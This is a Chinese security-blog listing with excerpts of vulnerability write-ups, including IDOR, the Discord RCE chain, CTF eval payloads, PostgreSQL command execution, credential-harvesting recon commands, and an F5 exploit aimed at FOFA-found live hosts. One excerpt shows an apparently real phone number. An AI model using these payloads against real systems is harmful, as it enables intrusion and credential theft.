• 某公共平台个人信息查看处存在全局越权修改

    01 漏洞标题 某公共平台个人信息查看处存在全局越权修改 02 漏洞类型 越权漏洞 03 漏洞等级 高危 04 漏洞地址 http://xxx.xxx.xx.com/er.app.xxxx/apps.html 05 漏洞详情 0x01 注册家政账户后,登录: http://xxx.xxx.xx.com/er.app.xxxx/apps.html 这个是账户A:ceshi   www的个人信息 id=275 这个是账户B:ceshi123   天天的个人信息 id=274 然后在账户A下越权修改B账户的个人信息: 0x02 然后burp下抓包,替换uld参数,将其改成B账户的274 然后到B账户下查看个人信息: 发现B账户中的个人信息被成功越权修改了 这里uld参数是可以遍历的,所以可以直接越权修改所有已注册用户的个人敏感信息: 06 漏洞危害 通过遍历id参数全局越权修改所有已注册用户的个人信息,这样就可以定向的进行诈骗或者是其他的信息贩卖等。 07 建议措施 做好权限的控制,建议添加token。 PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负...

    2020-12-03 701
  • Discord桌面应用程序RCE

    01 背景 几个月前,我在Discord桌面应用程序中发现了一个远程执行代码的问题,并通过其Bug Bounty Program报告了该问题。我发现RCE很有趣,因为它是通过组合多个错误实现的。在本文中,我想分享细节。为什么我选择Discord作为目标我感觉好像是在寻找Electron应用程序的漏洞,因此我一直在寻找一个赏金计划,该计划为Electron应用程序支付了赏金,我找到了Discord。另外,我是Discord用户,只想检查我使用的应用程序是否安全,因此我决定进行调查。 02 我发现的bug 基本上,我发现了以下三个bug,并通过结合使用它们实现了RCE。 缺少上下文隔离 iframe嵌入中的XSS Navigation restriction bypass(CVE-2020-15174) 我将一一解释这些错误。 缺少上下文隔离 在测试Electron应用程序时,首先,我始终会检查BrowserWindow API的选项,该选项用于创建浏览器窗口。通过检查它,我考虑了如何在渲染器上执行任意JavaScript时如何实现RCE。 Discord的Electron应用程序不是一个开源项目,但是Electron的JavaScript代码以asar格式保存在本地,我能够通过提取它来读取它。 在主窗口中,使用以下选项:  const mainWindowOptions = { title :D"iscord”, backgroundColor:getBackgroundColor(), width:DEFAULT_WIDTH, height:DEFAULT_HEIGHT, minWidth:MIN_WIDTH, minHeight:MIN_HEIGHT,transparent:false frame:false, resizable:true, show:isVisible, webPreferences: { blinkFeatures:'EnumerateDevices,AudioOutputDevices', nodeIntegration:false, preload:_path2.default.join(__ dirname,'mainScreenPreload.js'), nativeWindowOpen:true, enableRemoteModule:false, spellcheck:true }}; 我们这里应该检查的重要选项尤其是nodeIntegration和contextIsolation。从上面的代码中,我发现在Discord的主窗口中,nodeIntegration选项设置为false,而contextIsolation选项设置为false(使用版本的默认值)。 如果将nodeIntegration设置为true,则网页的JavaScript只需调用即可轻松使用Node.js功能require()。例如,在Windows上执行calc应用程序的方式是: <script> require('child_process')。exec('calc');</ script> 这一次,将nodeIntegration设置为false,因此我无法通过require()直接调用直接使用Node.js功能。 但是,仍然可以访问Node.js功能。该contextIsolation,另一个重要的选项,设置为false。如果要消除在应用程序上进行RCE的可能性,则不应将此选项设置为false。 如果禁用contextIsolation,则网页的JavaScript可能会影响在渲染器上执行Electron内部JavaScript代码和预加载脚本(在下文中,这些JavaScript将被称为网页外部的JavaScript代码)。例如,如果您Array.prototype.join使用网页JavaScript中的另一个函数重写  了JavaScript的一种内置方法,则网页外部的JavaScript代码在调用时也将使用重写的函数join。 此行为很危险,因为Electron允许web页面外部的JavaScript代码使用node.js功能,而不管nodeIntegration选项如何,并且通过干扰web页面中重写的功能来干扰它们,即使nodeIntegration为设置为false。 顺便说一句,以前还不知道这样的把戏。它最早是由Cure53在一次渗透测试中发现的,我也于2016年加入了该测试。之后,我们将其报告给Electron团队,并引入了contextIsolation。 最近,该笔测试报告已发布。如果您有兴趣,可以从以下链接中阅读: Pentest报告 https://drive.google.com/file/d/1LSsD9gzOejmQ2QipReyMXwr_M0Mg1GMH/view 您还可以阅读我在CureCon活动中使用的幻灯片: 该contextIsolation介绍了网页和JavaScript代码之外的网页,使每个代码的JavaScript执行不影响各间分隔的上下文。这是消除RCE可能性的必要功能,但是这次在Discord中将其禁用。 现在,我发现contextIsolation已禁用,因此我开始寻找一个可以干扰网页外部JavaScript代码来执行任意代码的地方。 通常,当我在Electron的渗透测试中为RCE创建PoC时,我首先尝试通过在渲染器上使用Electron的内部JavaScript代码来实现RCE。这是因为可以在任何Electron应用程序中执行渲染器上Electron的内部JavaScript代码,因此基本上我可以重用相同的代码来实现RCE,这很容易。 在我的幻灯片中,我介绍了可以通过使用Electron在导航时间执行的代码来实现RCE。不仅可以从该代码中获得代码,而且在某些地方也有这样的代码。(我希望将来发布PoC的示例。) 但是,根据使用的Electron的版本或设置的BrowserWindow选项,由于代码已更改或无法正确访问受影响的代码,有时通过Electron的代码进行PoC不能很好地工作。在这次,它没有用,所以我决定将目标更改为预加载脚本。 在检查预加载脚本时,我发现Discord将函数公开了,该函数允许通过调用某些允许的模块到 DiscordNative.nativeModules.requireModule('MODULE-NAME') 网页中。 在这里,我无法使用可直接用于RCE的模块,例如child_process模块,但是我发现了一个代码,在其中可以通过重写JavaScript内置方法并干扰公开模块的执行来实现RCE。 以下是PoC。我能确认的是,计算的应用程序弹出时,我所说的getGPUDriverVersions被称为“模块中定义的函数 discord_utils从devTools而重写RegExp.prototype.test和Array.prototype.join。 RegExp.prototype.test = function(){ return false;}Array.prototype.join = function(){ return“ calc”;}DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions(); 该getGPUDriverVersions函数尝试使用“ execa ”库执行程序,如下所示: module.exports.getGPUDriverVersions = async () => { if (process.platform !== 'win32') { return {};  } const result = {};  const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`; try { result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, [])); } catch (e) { result.nvidia = {error: e.toString()};  } return result;}; 通常execa会尝试执行在变量中指定的“ nvidia-smi.exe ”,nvidiaSmiPath但是,由于覆盖了RegExp.prototype.test和Array.prototype.join,因此在execa的内部处理中将参数替换为“ calc ” 。 具体来说,通过更改以下两个部分来替换该参数。 https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55 剩下的工作是找到一种在应用程序上执行JavaScript的方法。如果我可以找到它,则会导致RCE。 2.iframe嵌入中的XSS 如上所述,我发现RCE可能来自任意JavaScript执行,因此我试图找到一个XSS漏洞。该应用程序支持自动链接或Markdown功能,但看起来不错。因此,我将注意力转向了iframe嵌入功能。例如,iframe嵌入功能是在发布YouTube URL时自动在聊天中显示视频播放器的功能。 当网址贴出来,不和谐尝试获取OGP该URL的信息,如果存在OGP信息,它会显示网页标题,描述,在聊天的缩略图,相关的视频等。 Discord从OGP中提取视频URL,只有在允许视频URL域并且该URL实际上具有嵌入页面的URL格式的情况下,该URL才会嵌入到iframe中。 我找不到有关哪些服务可以嵌入到iframe中的文档,因此我试图通过检查CSP的frame-src指令来获取提示。当时,使用了以下CSP: Content-Security-Policy: [...] ; frame-src https://*.**屏蔽敏感词** https://*.twitch.tv https://open.spotify.com https://w.soundcloud.com https://sketchfab.com https://player.vimeo.com https://www.funimation.com https://twitter.com https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://js.stripe.com https://assets.braintreegateway.com https://checkout.paypal.comhttps://*.watchanimeattheoffice.com 显然,其中列出了一些允许iframe嵌入的内容(例如YouTube,Twitch,Spotify)。我试图通过将域一一指定到OGP信息中来检查URL是否可以嵌入iframe中,并尝试在嵌入式域中找到XSS。经过一番尝试,我发现可以将 C ++中列出的域之一sketchfab.com嵌入到iframe中,并在嵌入页面上找到XSS。当时我还不了解Sketchfab,但似乎这是一个用户可以在其中发布,购买和出售3D模型的平台。3D模型的脚注中有一个基于DOM的简单XSS。 以下是具有精心制作的OGP的PoC。当我将此URL发布到聊天中时,Sketchfab被嵌入到聊天中的iframe中,然后在iframe上单击几下后,将执行任意JavaScript。 https://l0.cm/discord_rce_og.html<head> <meta charset="utf-8"> <meta property="og:title" content="RCE DEMO"> [...] <meta property="og:video:url" content="https://sketchfab.com/models/2b198209466d43328169d2d14a4392bb/embed"> <meta property="og:video:type" content="text/html"> <meta property="og:video:width" content="1280"> <meta property="og:video:height" content="720"></head> 好的,最后我找到了XSS,但是JavaScript仍在iframe上执行。由于Electron不会将“网页外的JavaScript代码”加载到iframe中,因此即使我覆盖iframe上的JavaScript内置方法,也不会干扰Node.js的关键部分。要实现RCE,我们需要退出iframe,并在顶级浏览上下文中执行JavaScript。这需要从iframe打开新窗口,或将顶部窗口导航到iframe的另一个URL。 我检查了相关代码,并在主要流程的代码中找到了通过使用“ new-window ”和“ will-navigate ”事件来限制导航的代码: mainWindow.webContents.on('new-window', (e, windowURL, frameName, disposition, options) => { e.preventDefault(); if (frameName.startsWith(DISCORD_NAMESPACE) && windowURL.startsWith(WEBAPP_ENDPOINT)) { popoutWindows.openOrFocusWindow(e, windowURL, frameName, options); } else { _electron.shell.openExternal(windowURL); }});[...]mainWindow.webContents.on('will-navigate', (evt, url) => { if (!insideAuthFlow && !url.startsWith(WEBAPP_ENDPOINT)) { evt.preventDefault(); }}); 我认为这段代码可以正确地阻止用户打开新窗口或浏览顶部窗口。但是,我注意到了意外的行为。 3.Navigation restriction bypass(CVE-2020-15174) 我以为代码还可以,但是我尝试检查iframe的顶部导航是否被阻止。然后,令人惊讶的是,由于某种原因,导航没有被阻塞。我希望在导航发生之前,“ will-navigate ”事件会捕获该尝试preventDefault(),但会拒绝该尝试,但事实并非如此。 为了测试这种行为,我创建了一个小型的Electron应用程序。而且我发现由于某种原因,从iframe开始的顶部导航未发出“ will-navigate ”事件。确切地说,如果顶部的起点和iframe的起点在同一起点,则发出该事件,但如果起点在不同的起点,则不发出该事件。我认为这种行为没有正当的理由,因此我认为这是Electron的错误,因此决定稍后再向Electron团队报告。 借助此错误,我可以绕过导航限制。我应该做的最后一件事就是使用iframe的XSS导航到包含RCE代码的页面,例如 top.location="//l0.cm/discord_calc.html"。 这样,通过结合三个错误,我能够实现RCE, 03 结果 通过Discord的Bug赏金计划报告了这些问题。首先,Discord小组停用了Sketchfab嵌入,并采取了一种变通方法,通过将沙箱属性添加到iframe来阻止从iframe导航。一段时间后,启用了 contextIsolation。现在,即使我可以在应用程序上执行任意JavaScript,RCE也不会通过覆盖的JavaScript内置方法发生。我因这次发现而获得了5,000美元的奖励。 Sketchfab上的XSS是通过Sketchfab的Bug赏金计划报告的,并由Sketchfab开发人员迅速修复。我因这次发现而获得了300美元的奖励。 向电子安全团队报告了“ will-navigate ”事件中的错误是Electron的错误,并已修复为以下漏洞(CVE-2020-15174)。 ...

    2020-12-02 810
  • CTF|无参数RCE

    在CTF竞赛过程中,我们时常会遇到一种类型的题,那就是无参数命令执行。接下来通过例题的形式针对无参数命令执行常见技巧和利用方式进行了总结。 01 示例一 <?php include"flag.php"; echo"flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {   if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {  if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {   @.eval($_GET['exp']);              }              else{                  die("还差一点哦!");              }         }          else{              die("再好好想想!");          }     }      else{          die("还想读flag,臭弟弟!");      } }// highlight_file(__FILE__);?> 02 源码分析 利用GET方式传入exp参数; 代码中过滤了data/filter/php/phar伪协议,不能以伪协议形式直接读取文件; (?R)引用当前表达式,后面加了?递归调用。只允许执行类似a(b(c()))格式的无参数函数; 正则匹配还过滤了et/na/info等关键字,导致get()、phpinfo()等函数不能使用; eval($_GET[‘exp’]); 将输入的参数以php代码执行; 03 解题过程 查看当前目录下的文件,此处利用scandir()实现:print_r(scandir('.'));  #表示获取当前目录下的文件; print_r(scandir('../')); #表示获取上一级目录下的文件; 于是,可以利用该函数,查看目标系统目录,寻找包含flag的文件位置。由于正则表达式限制,不能再scandir('.')函数中加入参数。故此处使用current(localeconv())表示“.”。其中localeconv()函数返回一包含本地数字及货币格式信息的数组,其中数组的第一项就是"."。current() 返回数组中的当前单元, 默认取第一个值。 http://127.0.0.1/ctf/web/web-5/index.php?exp=print_r(scandir(pos(localeconv()))); http://127.0.0.1/ctf/web/web-5/index.php?exp=print_r(scandir(current(localeconv()))); 接下来就要考虑如何读取flag,读取文件内容我们可以想到的函数有: file_get_contents() #把整个文件读入一个字符串中;file #把整个文件读入一个数组中;readfile() #读入一个文件并写入到输出缓冲;highlight_file() #对文件进行语法高亮显示;show_source() #对文件进行语法高亮显示; 刚刚列举的几个函数,都需要将要读取的文件作为参数进行读取操作,由于题中代码用正则表达式限制,不能接收参数,该如何将文件名写道函数里面,然后读取文件内容呢? 利用array_flip()函数将读取当前目录的键和值进行反转,然后读取其中的值即可获得flag.php; 其中的键可以利用随机数函数array_rand(),进行随机生成; http://127.0.0.1/ctf/web/web-5/index.php?exp=pprint_r(array_rand(array_flip(scandir(pos(localeconv()))))); 由上图可以看出,通过array_rand()能够随机出flag.php文件,然后利用readfile()函数,读取该文件: http://127.0.0.1/ctf/web/web-5/index.php?exp=readfile(array_rand(array_flip(scandir(pos(localeconv()))))); ...

    2020-11-29 782
  • 利用电子邮件中的HTML注入

    HTMLi是一个在呈现HTML代码的任何应用程序中可利用的漏洞。电子邮件是其中之一。 本文的其余部分说明了如何通过目标上的注释通知功能将HTML注入电子邮件中。 Part 01 记得这里未讨论的HTML注入吗? 因此,在通知电子邮件中反映了comment和presentationTitle参数的值。 最初看起来如下: {"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"This is Redacted","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted Copy www.footstep.ninja","slideLocalId":"5p3nrib"}} 然后,在为参数注入presentationTitleHTML属性后,它看起来如下所示: {"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted\" <br/><br/> <div style='color:#1a3a69;line-height:1.5em;font-size:18px;text-align:center'>This is a test comment</div><br/> <a style='background-color:#f68270;border:1px solid #333333;border-color:#f68270;border-radius:6px;border-width:1px;color:#ffffff;display:inline-block;font-family:arial,helvetica,sans-serif;font-size:16px;font-weight:bold;letter-spacing:0px;line-height:16px;padding:12px 18px 12px 18px;text-align:center;text-decoration:none' href='https://footstep.ninja' target='_blank' data-saferedirecturl='https://footstep.ninja'>View Deck</a> <!-- Copy https://www.footstep.ninja","slideLocalId":"5p3nrib"}} Part 02 自然通知如下所示: Part 03 看起来像这样; 通过查看原始消息,我得到了确切的HTML:单击省略号,然后单击“显示原始” ...

    2020-11-26 932
  • ​某信息平台敏感信息泄露

    01 漏洞标题 某信息平台敏感信息泄露 02 漏洞类型 信息泄露 03 漏洞等级 高危 04 漏洞地址 http://www.xxxxx.org.cn/ 05 漏洞详情 信息平台敏感信息泄露,可以直接获取所有高级专家的所有手机号。 专家库具体某一专家信息查看,可以在URL处直接看到手机号。 0x01 访问 http://www.xxxx.org.cn/ExpertView.aspx?id=3&username=13926041501 0x02 批量可以看到每条信息都携带了用户的详细手机号信息。 http://www.xxxx.org.cn/ExpertsList.aspx 涉及到的专家信息共有700多条信息,包含完整的姓名和手机号。 06 漏洞危害 此处可以批量获取到的专家信息共有700多条信息,包含完整的姓名和手机号工作地点,被攻击者获取后可以定点钓鱼等,存在极大的安全风险。 07 建议措施 敏感信息做脱敏处理,不反回手机号等敏感信息。 PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负。 ...

    2020-11-18 996
  • 如何进行内网信息收集

    渗透测试的本质是信息收集,我们可以将内网信息收集大致分为5个步骤,即本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。 最常见的两个问题就是: 我是谁?-- whoami我在哪?-- ipconfig/ifconfig 当获取一台主机的管理员权限的时候,我们总是迫不及待想要去深入了解一下。 本机信息收集 1.查询账户信息: 对当前主机的用户角色和用户权限做了解,判断是否需要进一步提升权限。 win:whoami、net user 用户名linux:whoami、id、cat /etc/shadow、cat /etc/passwd 2.查询网络和端口信息 根据目的主机的IP地址/网络连接/相关网络地址,确认所连接的网络情况。 win:ipconfig、netstat -ano ARP表:arp -a 路由表: route print 查看dns缓存记录命令:ipconfig/displaydns linux:ifconfig、netstat -anplt ARP表:arp -a / 路由表:route -n 查看登录日志获取登录来源ip 3.查询进程列表 查看本地运行的所有进程,确认本地软件运行情况,重点可以关注安全软件。 win:tasklist linux: ps、 top 4.查询系统和补丁信息 获取当前主机的系统版本和补丁更新情况,可用来辅助提升权限。 win:systeminfo,查询系统信息/补丁安装情况。 wmic qfe get Caption,description,HotfixID,installedOn //查询补丁信息,包含说明链接/补丁描述/KB编号/更新时间等信息 wmic qfe list full 查询全部信息 Linux: 通过查看内核版本 uname -a 或者使用rpm -qa来查询安装了哪些软件包 5.凭证收集 服务器端存有敏感信息,通过收集各种登录凭证以便扩大战果。 Windows:本地密码Hash和明文密码/抓取浏览器密码/服务端明文密码linux:history记录敏感操作/shadow文件破解/mimipenguin抓取密码/使用Strace收集登录凭证/全盘搜索敏感信息 域内信息收集 搜集完本机相关信息后,就需要判断当前主机是否在域内,如果在域内,就需要进一步收集域内信息 1.判断是否有域 一般域服务器都会同时作为时间服务器,所以使用下面命令判断主域 运行 net time /domain 该命令后,一般会有如下三种情况: 1.存在域,但当前用户不是域用户,提示说明权限不够 C:\Users>bypass>net time /domain 发生系统错误 5 拒绝访问。 2.存在域,并且当前用户是域用户 C:\Users\Administrator>net time /domain \\dc.test.com 的当前时间是 2020/10/23 21:18:37 命令成功完成。 3.当前网络环境为工作组,不存在域 C:\Users\Administrator>net time /domain 找不到域 WORKGROUP 的域控制器。 2.查找域管理员 net user /domain //获取域用户列表net group /domain //查询域内所有用户组列表net group “Domain Admins” /domain //查询域管理员用户net group "Domain Controllers" /domain //查看域控制器net localgroup administrators /domain //查询域内置本地管理员组用户 3.找到域控 一般来说,域控服务器IP地址为DNS服务器地址,找到DNS服务器地址就可以定位域控。 nslookup/ping 域名,解析到域控服务器IP地址 ...

    2020-11-18 732
  • 酷我音乐真实地址解析

    总结上次酷狗的经验我没有去百度直接去抓协议 打开我们的网页酷我随便播放一个音 f12仔细看一下MP3在哪里 找到了酷我的音乐地址 使用rid替换即可 返回值是jso api: http://www.kuwo.cn/url?format=mp3&amp;rid=77810434&amp;response=url&amp;type=convert_url3&amp;br=128kmp3&amp;from=web&amp;t=1569587300382&amp;reqId=4a567af1-e122-11e9-bade-01a02613b222 ...

    2020-10-22 1992
  • fugu基于checkm8漏洞的开源越狱

    支持的设备 当前版本的Fugu仅支持iPad Pro(2017)和iPhone 7(iOS 13-13.3.1)。 项目获取 git clone https://github.com/LinusHenze/Fugu.git 建造 注意:广大研究人员也可以直接从本项目的【Release页面】下载Fugu的预编译版本。 在构建Fugu之前,请确保已安装好了Xcode以及Homebrew。 然后使用Homebrew来安装llvm和binutils: brew install llvm binutils 接下来,在Xcode中打开Fugu项目,选择Fugu作为目标并进行项目构建。构建完成后,Xcode将在构建目录中生成Fugu项目以及一个Shellcode目录,然后我们就可以开始使用Fugu了。 工具使用 我建议大家以无参数的形式运行Fugu,并查看所有的可用选项。 如果你想要对你的苹果设备进行越狱操作,可以直接运行下列命令: Fugu iStrap 你可能需要多次运行该命令才可以成功启用Fugu,如果你尝试了四、五次都没成功的话,请调整设备进入DFU模式后再进行尝试。 该命令将会向你的苹果设备发送一个内核启动引导程序以及iDownload(一款能够用来向苹果设备发送文件或执行命令的程序)。 安装Sileo、SSH和MobileSubstrate 注意:越狱有风险,操作需谨慎,请备份好所有文件后再进行操作,如操作对设备造成的损坏,请用户自行承担。 确保你的设备上已经安装好了libusbmuxd,如果没有安装,你可以通过Homebrew并使用下列命令来安装libusbmuxd: brew install libusbmuxd 安装好usbmuxd之后,启动你的苹果设备并进入越狱模式。同时,确保你的设备已通过USB连接到了你的macOS设备上。 接下来,使用下列命令安装Sileo: python install_sileo.py 运行该脚本之后,将会下载所有安装Sileo所需的组件并完成Sileo的安装。安装完成之后,你将会在应用程序栏中看到Sileo的图标。此时,SSH将会在后台运行,请确保已经修改了root/mobile密码。 组件Fugu由下列组件构成: 1、Fugu:macOS应用程序,可以通过checkm8漏洞来利用你苹果设备中的安全缺陷,并上传iStrap、iStrap加载器以及iDownload。 2、iStrap加载器:一段Shellcode代码,iBoot后会修复iBoot并加载iStrap。 3、iStrap:内核启动引导程序,会在苹果设备启动时显示,它会修复内核,注入启动参数并向内核注入Shellcode。 4、iDownload:运行在苹果设备上的程序,会在启动引导过程中完成安装。程序会监听端口1337,并且会给用户提供一个类似Bash的接口。 ...

    2020-10-21 848
  • CVE-2020-5902 简单利用

    漏洞简述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对TMUI进行网络访问,以执行任意系统命令、创建或删除文件、禁用服务和/或执行任意Java代码。 受影响的版本 F5 BIG-IP 15.x 已知易受攻击版本 15.1.0、15.0.0F5 BIG-IP 14.x 已知易受攻击版本 14.1.0-14.1.2F5 BIG-IP 13.x 已知易受攻击版本 13.1.0-13.1.3F5 BIG-IP 12.x 已知易受攻击版本 12.1.0-12.1.5F5 BIG-IP 11.x 已知易受攻击版本 11.6.1-11.6.5 漏洞复现下载poc https://github.com/zhzyker/CVE-2020-5902 查找具备漏洞版本的目标,这里利用FOFA搜索的 title="BIG-IP" 关键信息 运行命令 python3 cve-2020-5902_file.py IP 利用成功,可以返回当前用户信息 注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。 ...

    2020-10-18 859
  • 一份礼物.apk的逆向分析

    事情起因是震惊全国大学生的1013事件!!! 刚好看到社团群里在讨论这个,于是就发挥专业特长分析一下 拿到apk ,第一步肯定先放到虚拟机里跑一下看下效果emmm这似曾相识的页面,这熟悉的音量,唯一变化的就是音乐变成了O泡果奶的魔性洗脑广告。懂了,这不就是 "送给最好的ta.apk" 吗? 使用Android killer或apk改之理分析一下,这里使用Android Killer: 通过对比送给最好的ta.apk发现: 多了一个layout.lua文件,不过从名字上看这就是个布局文件,影响不大,再就是mp3文件名字从原来的0.mp3改为了mc.mp3,其他的都没变,甚至软件图标都没变。这个mc.mp3就是播放的广告音频了。 剩下的就简单了,虽然lua文件是加密过的,通过分析java代码,发现加密方式也没变,依旧使用/lib/armeabli-v7a/libluajava.so加密,因此使用ida7.0(x32)对这个文件逆向分析: 查找到在luaL.loadbufferx里面有对文件解密的过程 这里直接拿pcat大佬写的解密脚本: from ctypes import *import sys def decrypt(filename): s = open(filename, 'rb').read() outfile = 'out.lua' if s[0] == chr(0x1b) and s[1] != chr(0x4c): rst = chr(0x1b) size = len(s) v10 = 0 for i in range(1, size): v10 += size v = (c_ulonglong(-2139062143 * v10).value >> 32) + v10 v1 = c_uint(v).value >> 7 v2 = c_int(v).value < 0 rst += chr(ord(s[i]) ^ (v10 + v1 + v2) & 0xff) with open(outfile, 'wb') as f: f.write(rst) else: pass def foo(): print len(sys.argv) if len(sys.argv) == 2: filename = sys.argv[1] else: filename = 'main.lua' decrypt(filename) if __name__ == '__main__': foo() 将得到的文件使用unluac.jar进行还原,最终得到三个lua文件分别为: init.lua: local L0, L1appname = "\230\143\146\228\187\1829.0"appver = "9.0"packagename = "com.ta.cnm"appcode = "9"appsdk = "15"theme = "Theme_DeviceDefault_Light_NoActionBar"L0 = {}L1 = "WRITE_EXTERNAL_STORAGE"L0[1] = L1user_permission = L0 main.lua: local L0, L1, L2, L3L0 = requireL1 = "import"L0(L1)L0 = importL1 = "android.app.*"L0(L1)L0 = importL1 = "android.os.*"L0(L1)L0 = importL1 = "android.widget.*"L0(L1)L0 = importL1 = "android.view.*"L0(L1)L0 = importL1 = "android.view.View"L0(L1)L0 = importL1 = "android.content.Context"L0(L1)L0 = importL1 = "android.media.MediaPlayer"L0(L1)L0 = importL1 = "android.media.AudioManager"L0(L1)L0 = importL1 = "com.androlua.Ticker"L0(L1)L0 = activityL0 = L0.getSystemServiceL1 = ContextL1 = L1.AUDIO_SERVICEL0 = L0(L1)L0 = L0.setStreamVolumeL1 = AudioManagerL1 = L1.STREAM_MUSICL2 = 15L3 = AudioManagerL3 = L3.FLAG_SHOW_UIL0(L1, L2, L3)L0 = activityL0 = L0.getDecorViewL0 = L0()L0 = L0.setSystemUiVisibilityL1 = ViewL1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATIONL2 = ViewL2 = L2.SYSTEM_UI_FLAG_IMMERSIVEL1 = L1 | L2L0(L1)L0 = MediaPlayerL0 = L0()m = L0L0 = mL0 = L0.resetL0()L0 = mL0 = L0.setDataSourceL1 = activityL1 = L1.getLuaDirL1 = L1()L2 = "/mc.mp3"L1 = L1 .. L2L0(L1)L0 = mL0 = L0.prepareL0()L0 = mL0 = L0.startL0()L0 = mL0 = L0.setLoopingL1 = trueL0(L1)L0 = TickerL0 = L0()ti = L0L0 = tiL0.Period = 10L0 = tifunction L1() local L0, L1, L2, L3 L0 = activity L0 = L0.getSystemService L1 = Context L1 = L1.AUDIO_SERVICE L0 = L0(L1) L0 = L0.setStreamVolume L1 = AudioManager L1 = L1.STREAM_MUSIC L2 = 15 L3 = AudioManager L3 = L3.FLAG_SHOW_UI L0(L1, L2, L3) L0 = activity L0 = L0.getDecorView L0 = L0() L0 = L0.setSystemUiVisibility L1 = View L1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATION L2 = View L2 = L2.SYSTEM_UI_FLAG_IMMERSIVE L1 = L1 | L2 L0(L1)endL0.onTick = L1L0 = tiL0 = L0.startL0()function L0(A0, A1) local L2, L3, L4, L5 L2 = string L2 = L2.find L3 = tostring L4 = A1 L3 = L3(L4) L4 = "KEYCODE_BACK" L2 = L2(L3, L4) if L2 ~= nil then L2 = activity L2 = L2.getSystemService L3 = Context L3 = L3.AUDIO_SERVICE L2 = L2(L3) L2 = L2.setStreamVolume L3 = AudioManager L3 = L3.STREAM_MUSIC L4 = 15 L5 = AudioManager L5 = L5.FLAG_SHOW_UI L2(L3, L4, L5) end L2 = true return L2endonKeyDown = L0 layout.lua: local L0, L1, L2, L3L0 = {}L1 = LinearLayoutL0.layout_width = "fill"L0.layout_height = "fill"L2 = {}L3 = ButtonL2.textColor = "#D50000"L2.text = "\230\131\138\228\184\141\230\131\138\229\150\156 \230\132\143\228\184\141\230\132\143\229\164\150"L2.layout_height = "match_parent"L2.layout_width = "match_parent"L2.background = "#88888888"L2[1] = L3L0[1] = L1L0[2] = L2return L0 分析这三个文件: init.lua:  定义了app的名字,版本(已经是9.0了吗),包名(有点暴躁啊这位老哥),sdk版本,使用的主题,需要的权限等数据 main.lua: 具体逻辑都在这里面,大概就是读取mc.mp3 播放 并一直把音量调整到15(最大),监听禁用返回按钮。 layout.lua: 设置页面布局 恶搞一时爽,但是也要有度。 万一下一次是个带病毒的文件呢? 对了  解决方案-----------关掉进程或关机! ...

    2020-10-16 1126
  • PostgreSQL 高权限命令执行漏洞

    PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 默认账号密码为postgres/postgres。 首先连接到postgres中,并执行参考链接中的POC: <font face="宋体" size="4">DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;</font> FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中 大概就这些…… ...

    2020-10-09 948
  • 红蓝演练之攻击溯源手段

    攻击溯源的技术手段,主要包括ip定位、ID定位与攻击者定位。 通过ip可定位攻击者所在位置,以及通过ip反查域名等手段,查询域名的注册信息,域名注册人及邮箱等信息。 通过ID定位可获取攻击者常用的网络ID,查询攻击者使用同类ID注册过的微博或者博客、论坛等网站,通过对网络ID注册以及使用情况的查询,定位攻击者所在公司、手机号、邮箱、QQ等信息。 或通过其他手段定位攻击者,如反制攻击者vps,获取攻击者vps中的敏感信息、反钓鱼、恶意程序分析溯源等手段。 一、ip定位技术 通过安全设备或其他技术手段抓取攻击者的IP,对IP进行定位,查询此IP为IDC的IP、CDN的IP还是普通运营商的出口IP,通过IP反查可能会查询到攻击者使用的web域名、注册人、邮箱等信息。一般常用的IP查询工具有: 高精度IP定位:https://www.opengps.cn/Data/IP/LocHighAcc.aspx rtbasia(IP查询):https://ip.rtbasia.com/ ipplus360(IP查询):http://www.ipplus360.com/ip/ IP信息查询:https://www.ipip.net/ip.html/ IP地址查询在线工具:https://tool.lu/ip/ 当发现某些IP的攻击后,可以尝试通过此IP去溯源攻击者,具体实现过程如下: 首先通过ipip.net网站或者其他接口,查询此IP为IDC的IP、CDN的IP还是普通运营商的出口IP。 如果IP反查到域名就可以去站长之家或者whois.domaintools.com等网站去查询域名的注册信息。 通过收集到的这些信息,就比较容易定位到人。 在通过IP定位技术溯源过程,应注意以下情况: 假如IP反查到的域名过多,考虑就是CDN了,就没必要继续去查了。 假如是普通运营商的出口IP只能使用一些高精度IP定位工具粗略估计攻击者的地址,如果需要具体定位到人,则需要更多的信息。 二、ID追踪技术 